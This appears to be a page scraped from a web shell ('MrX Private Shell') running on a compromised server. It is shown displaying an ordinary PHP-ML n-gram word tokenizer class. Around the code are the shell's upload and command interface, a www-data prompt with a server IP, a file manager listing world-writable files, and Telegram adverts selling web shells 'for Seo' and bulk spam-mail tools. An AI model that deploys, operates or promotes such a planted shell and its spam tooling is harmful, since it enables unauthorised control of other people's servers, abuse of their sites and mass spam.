__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php

declare(strict_types=1);

namespace Phpml\Tokenization;

use Phpml\Exception\InvalidArgumentException;

/**
 * Tokenizer that emits word-level n-grams.
 *
 * Words are runs of two or more word characters (matched in UTF-8 mode).
 * For every size from minGram up to maxGram, each window of that many
 * consecutive words is joined with single spaces and emitted as one token.
 */
class NGramWordTokenizer extends WordTokenizer
{
    /**
     * Smallest n-gram size (in words) to emit.
     *
     * @var int
     */
    private $minGram;

    /**
     * Largest n-gram size (in words) to emit.
     *
     * @var int
     */
    private $maxGram;

    /**
     * @param int $minGram smallest n-gram size; must be at least 1
     * @param int $maxGram largest n-gram size; must be at least $minGram
     *
     * @throws InvalidArgumentException when either bound is below 1 or the bounds are inverted
     */
    public function __construct(int $minGram = 1, int $maxGram = 2)
    {
        $isValidRange = $minGram >= 1 && $maxGram >= 1 && $minGram <= $maxGram;

        if (!$isValidRange) {
            throw new InvalidArgumentException(sprintf(
                'Invalid (%s, %s) minGram and maxGram value combination',
                $minGram,
                $maxGram
            ));
        }

        $this->minGram = $minGram;
        $this->maxGram = $maxGram;
    }

    /**
     * Splits the text into words and returns all n-grams of the configured sizes.
     *
     * The result is ordered by n-gram size first (smallest to largest) and,
     * within one size, by position in the text.
     *
     * @param string $text text to tokenize
     *
     * @return string[] n-grams, each a space-separated sequence of words
     */
    public function tokenize(string $text): array
    {
        preg_match_all('/\w\w+/u', $text, $matches);
        $words = $matches[0];

        // Gather one list per size, then flatten them in a single merge.
        // The validated range guarantees at least one list is collected.
        $perSize = [];
        for ($size = $this->minGram; $size <= $this->maxGram; $size++) {
            $perSize[] = $this->getNgrams($words, $size);
        }

        return array_merge(...$perSize);
    }

    /**
     * Builds every n-gram of exactly $n consecutive words.
     *
     * @param string[] $match sequentially indexed list of words
     * @param int      $n     number of words per n-gram
     *
     * @return string[] n-grams in order of appearance; empty when fewer than $n words are given
     */
    private function getNgrams(array $match, int $n = 2): array
    {
        // Number of full windows of $n words that fit into the list.
        $windowCount = count($match) - $n + 1;

        $ngrams = [];
        for ($start = 0; $start < $windowCount; $start++) {
            $ngrams[] = implode(' ', array_slice($match, $start, $n));
        }

        return $ngrams;
    }
}

Filemanager

Name Type Size Permission Actions
NGramTokenizer.php File 1.29 KB 0777
NGramWordTokenizer.php File 1.41 KB 0777
Tokenizer.php File 139 B 0777
WhitespaceTokenizer.php File 462 B 0777
WordTokenizer.php File 273 B 0777
Filemanager